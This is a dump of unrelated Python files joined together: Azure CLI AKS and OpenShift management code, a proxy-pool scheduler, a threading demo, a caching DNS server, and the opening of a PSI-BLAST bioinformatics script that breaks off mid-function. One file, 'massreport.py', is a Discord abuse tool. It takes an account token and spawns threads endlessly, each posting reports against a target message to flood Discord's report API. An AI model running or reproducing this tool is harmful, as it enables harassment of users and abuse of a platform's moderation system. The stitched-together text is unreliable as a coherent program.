raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
mode=mode
)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
node_count = instance.count
_validate_autoscaler_update_counts(min_count, max_count, node_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, node_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("Current node count '{}' is not in the range of min-count and max-count.".format(node_count))
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None,
management_subnet_cidr=None,
private_cluster=None):
if vnet_peer is not None:
raise CLIError('Vnet peering is no longer supported during cluster creation.'
'Instead it is possible to edit vnet properties after cluster creation')
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
if bool(private_cluster) != bool(management_subnet_cidr is not None):
raise CLIError('Both --private-cluster and --management-subnet-cidr need to be supplied or neither.')
api_properties = OpenShiftAPIProperties(
private_api_server=bool(private_cluster)
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterMasterPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix,
api_properties=api_properties
)
identity_providers = []
create_aad = False
# Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(vnet_cidr=vnet_prefix, management_subnet_cidr=management_subnet_cidr)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_update(cmd, client, resource_group_name, name, refresh_cluster=None, no_wait=False):
instance = client.get(resource_group_name, name)
if refresh_cluster:
instance.refresh_cluster = True
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
|
massreport.py
|
###############################################################
# ███████╗ █████╗ ████████╗██╗ ██╗██████╗ ███╗ ██╗███████╗
# ██╔════╝██╔══██╗╚══██╔══╝██║ ██║██╔══██╗████╗ ██║██╔════╝
# ███████╗███████║ ██║ ██║ ██║██████╔╝██╔██╗ ██║█████╗
# ╚════██║██╔══██║ ██║ ██║ ██║██╔══██╗██║╚██╗██║██╔══╝
# ███████║██║ ██║ ██║ ╚██████╔╝██║ ██║██║ ╚████║███████╗
# ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝╚══════╝
###############################################################
# Crée par GalackQSM
# Github: https://github.com/GalackQSM/Saturne
# Discord: https://discord.gg/saturnetools|XvjJpw4D3m
# © 2022 Saturne
###############################################################
import requests
import threading
from colorama import Fore
def MassReport(token, guild_id1, channel_id1, message_id1, reason1):
for i in range(500, 1000):
while True:
threading.Thread(target=Report, args=(token, guild_id1, channel_id1, message_id1, reason1)).start()
def Report(token, guild_id1, channel_id1, message_id1, reason1):
Responses = {
'401: Unauthorized': f'{Fore.RED}Token Discord invalide.',
'Missing Access': f'{Fore.RED}Accès manquant au salon ou au serveur.',
'Vous devez vérifier votre compte pour effectuer cette action.': f'{Fore.RED} Non vérifié.'
}
report = requests.post(
'https://discordapp.com/api/v8/report', json={
'channel_id': channel_id1,
'message_id': message_id1,
'guild_id': guild_id1,
'reason': reason1
}, headers={
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'sv-SE',
'User-Agent': 'Discord/21295 CFNetwork/1128.0.1 Darwin/19.6.0',
'Content-Type': 'application/json',
'Authorization': token
}
)
if (status := report.status_code) == 201:
print(f"{Fore.GREEN}Rapport envoyé avec succès!\n")
elif status in (401, 403):
print(Responses[report.json()['message']]+"\n")
else:
print(f"{Fore.RED}Erreur: {report.text} | Code d'état: {status}\n")
|
scheduler.py
|
import time
from multiprocessing import Process
from proxypool.api import app
from proxypool.getter import Getter
from proxypool.tester import Tester
from proxypool.db import RedisClient
from proxypool.setting import *
class Scheduler():
def schedule_tester(self, cycle=TESTER_CYCLE):
"""
定时测试代理
"""
tester = Tester()
while True:
print('测试器开始运行')
tester.run()
time.sleep(cycle)
def schedule_getter(self, cycle=GETTER_CYCLE):
"""
定时获取代理
"""
getter = Getter()
while True:
print('开始抓取代理')
getter.run()
time.sleep(cycle)
def schedule_api(self):
"""
开启API
"""
app.run(API_HOST, API_PORT)
def run(self):
print('代理池开始运行')
if TESTER_ENABLED:
tester_process = Process(target=self.schedule_tester)
tester_process.start()
if GETTER_ENABLED:
getter_process = Process(target=self.schedule_getter)
getter_process.start()
if API_ENABLED:
api_process = Process(target=self.schedule_api)
api_process.start()
|
1.py
|
import threading
from time import sleep,ctime
loops=[2,4]
class ThreadFunc(object):
def __init__(self,func,args,name=''):
self.name=name
self.func=func
self.args=args
def __call__(self):
self.res=self.func(*self.args)
def loop(nloop,nsec):
print 'start loop',nloop,'at:',ctime()
sleep(nsec)
print 'loop',nloop,'done at:',ctime()
def main():
print 'starting at:',ctime()
threads=[]
nloops=range(len(loops))
print nloops
print range(len(loops))
for i in nloops:
t=threading.Thread(target=ThreadFunc(loop,(i,loops[i]),loop.__name__))
threads.append(t)
for i in nloops:
threads[i].start()
for i in nloops:
threads[i].join()
print 'all done at:',ctime()
if __name__=='__main__':
main()
|
server.py
|
#!/usr/bin/env python3
import dns.exception
import dns.flags
import dns.message
import dns.rcode
import dns.rdataclass
import dns.rdatatype
import dns.resolver
import json
import math
import os
import pickle
import redis
import socket
import socketserver
import struct
import sys
import threading
import time
allowed_rdtypes = [
dns.rdatatype.A,
dns.rdatatype.AAAA,
dns.rdatatype.MX,
dns.rdatatype.NS,
dns.rdatatype.SOA,
dns.rdatatype.SRV,
dns.rdatatype.CNAME,
dns.rdatatype.PTR,
dns.rdatatype.CAA,
]
class DomainTrie:
def __init__(self):
self.root = {}
self.end_symbol = 0
def add(self, domain, status):
ref = self.root
for index, part in enumerate(reversed(domain.split('.'))):
if index == 0 and not part:
continue
if part not in ref:
ref[part] = {}
ref = ref[part]
ref[self.end_symbol] = status
def lookup(self, domain):
ref = self.root
status = False
for index, part in enumerate(reversed(domain.split('.'))):
if index == 0 and not part:
continue
if part not in ref:
break
try:
ref = ref[part]
status = ref.get(self.end_symbol, status)
except KeyError:
break
return status
def setup_nameservers():
if 'nameservers' in config:
dns.resolver.default_resolver = dns.resolver.Resolver(configure=False)
dns.resolver.default_resolver.nameservers = config['nameservers']
def get_config(conf=None):
if conf is None:
config = {}
else:
with open(conf) as f:
config = json.load(f)
config['domains'] = DomainTrie()
for domain in config.get('blacklist', []):
config['domains'].add(domain.encode('idna').decode(), True)
for domain in config.get('whitelist', []):
config['domains'].add(domain.encode('idna').decode(), False)
if 'redis_socket_file' not in config:
for sockfile in [
'/var/run/redis/redis.sock',
'/var/run/redis/redis-server.sock',
]:
if os.path.exists(sockfile):
config['redis_socket_file'] = sockfile
break
else:
raise Exception('Unable to find redis socket path')
config.setdefault('ratelimits', {})
config.setdefault('port', 53)
config['ratelimits'].setdefault('limit', 20)
config['ratelimits'].setdefault('limit_burst', 4)
config['ratelimits'].setdefault('enabled', True)
return config
def ratelimited(ip):
if '.' in ip[-4:]:
# convert IPv6-mapped IPv4 address to pure IPv4 address.
key = 'dns:r:4:%s' % ip[ip.rfind(':') + 1 :]
else:
# IPv6 /112 subnet
key = 'dns:r:6:%s' % socket.inet_pton(socket.AF_INET6, ip)[:-2]
limit = config['ratelimits']['limit']
limit_burst = config['ratelimits']['limit_burst']
ratio = limit / limit_burst
rl_params = redis_conn.get(key)
current_time = time.time()
if rl_params:
access_time, tokens = pickle.loads(rl_params)
tokens = min(limit, tokens + limit_burst * (current_time - access_time))
else:
access_time, tokens = current_time, limit
redis_conn.set(key, pickle.dumps((current_time, max(0, tokens - 1))))
redis_conn.expire(key, math.ceil(ratio))
return tokens < 1
def dns_query(name, rdclass, rdtype):
if rdclass != dns.rdataclass.IN or rdtype not in allowed_rdtypes:
return (dns.rcode.REFUSED, [], [], [])
try:
key = 'dns:q:%s:%i' % (name, rdtype)
cached_result = redis_conn.get(key)
if cached_result is not None:
return pickle.loads(cached_result)
if config['domains'].lookup(name):
rv = (dns.rcode.NXDOMAIN, [], [], [])
expiration = 0
else:
result = dns.resolver.query(name, rdtype, raise_on_no_answer=False)
response = result.response
rv = (
response.rcode(),
response.answer,
response.authority,
response.additional,
)
expiration = max(60, min(int(time.time() - result.expiration), 3600))
except dns.exception.DNSException as e:
expiration = 60
if isinstance(e, dns.resolver.NXDOMAIN):
rcode = dns.rcode.NXDOMAIN
elif isinstance(e, dns.resolver.NoMetaqueries):
rcode = dns.rcode.REFUSED
else:
rcode = dns.rcode.SERVFAIL
rv = (rcode, [], [], [])
if expiration > 0:
redis_conn.set(key, pickle.dumps(rv))
redis_conn.expire(key, expiration)
return rv
def make_response(query):
response = dns.message.Message(query.id)
response.flags = dns.flags.QR | dns.flags.RA | (query.flags & dns.flags.RD)
response.set_opcode(query.opcode())
response.question = list(query.question)
return response
def handle_query(raw_data, client_ip):
try:
query = dns.message.from_wire(raw_data)
except dns.exception.DNSException:
return
if len(query.question) != 1:
return
if config['ratelimits']['enabled'] and ratelimited(client_ip):
return
name = str(query.question[0].name).lower()
rdtype = query.question[0].rdtype
rdclass = query.question[0].rdclass
result = dns_query(name, rdclass, rdtype)
response = make_response(query)
response.set_rcode(result[0])
response.answer = result[1]
response.authority = result[2]
response.additional = result[3]
return response
class UDPHandler(socketserver.BaseRequestHandler):
def handle(self):
raw_data, socket = self.request
response = handle_query(raw_data, self.client_address[0])
if response is None:
return
raw_response = response.to_wire()
if len(raw_response) <= 512:
socket.sendto(raw_response, self.client_address)
else:
response.flags |= dns.flags.TC
socket.sendto(response.to_wire()[:512], self.client_address)
class TCPHandler(socketserver.BaseRequestHandler):
def handle(self):
socket = self.request
try:
query_length_bytes = socket.recv(2)
query_length = struct.unpack('!H', query_length_bytes)
raw_data = socket.recv(query_length[0])
response = handle_query(raw_data, self.client_address[0])
if response is not None:
raw_response = response.to_wire()
response_length_bytes = struct.pack('!H', len(raw_response))
socket.send(response_length_bytes + raw_response)
except (struct.error, OSError):
pass
finally:
socket.close()
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def run_server():
for server_class in [ThreadedUDPServer, ThreadedTCPServer]:
server_class.allow_reuse_address = True
server_class.address_family = socket.AF_INET6
udp_server = ThreadedUDPServer(('', config['port']), UDPHandler)
tcp_server = ThreadedTCPServer(('', config['port']), TCPHandler)
udp_server_thread = threading.Thread(target=udp_server.serve_forever)
tcp_server_thread = threading.Thread(target=tcp_server.serve_forever)
try:
for thread in [udp_server_thread, tcp_server_thread]:
thread.start()
for thread in [udp_server_thread, tcp_server_thread]:
thread.join()
except (KeyboardInterrupt, SystemExit):
pass
finally:
for server in [udp_server, tcp_server]:
server.shutdown()
server.server_close()
if __name__ == '__main__':
if len(sys.argv) < 2:
config = get_config()
else:
config = get_config(sys.argv[1])
redis_conn = redis.StrictRedis(unix_socket_path=config['redis_socket_file'])
setup_nameservers()
run_server()
|
finalpsyblast.py
|
#!/usr/bin/env python
'''
phyST
This program takes a protein family code (i.e. 1.A.1) as input, then
searches for the alignment sequence of the first protein in that
family (i.e. 1.A.1.1.1), then psi-blasts this sequence, and finally
outputs the number of protein homologues from every phylum found as
well as the average sequence length of these homologues
NOTE: TO CREATE CLUSTAL OUTPUT (.FLAT FILE) MAKE A FOLDER CALLED
"clustalout" IN THE SAME DIRECTORY AS THE SCRIPT.
'''
# Written by Hari Krishnan, Larry Chau
# lchau@ucsd.edu - larrymchau@gmail.com
# hkkrishn563@gmail.com - hkkrishn@ucsd.edu
import mechanize
import sys,re,os
import urllib2
import tempfile
from Bio import Entrez
from bs4 import BeautifulSoup
from time import sleep
import cookielib
import math
import multiprocessing as mp
import optparse
import ctypes
#Specify the user's email when using Entrez from Bio package
Entrez.email = "lchau@ucsd.edu"
#Globals, working data
interval = 0
br = mechanize.Browser()
tfiles = []
lo_cutoff = 50
eValue = '0.0001'
alignment = ''
def browser_init():
global br
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) \
Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
#Code copied from protocol1.py
def wait():
global interval
global br
text = re.compile('This page will be automatically updated in <b>(\d+)<\/b> seconds?')
time = text.search(br.response().read())
if bool(time):
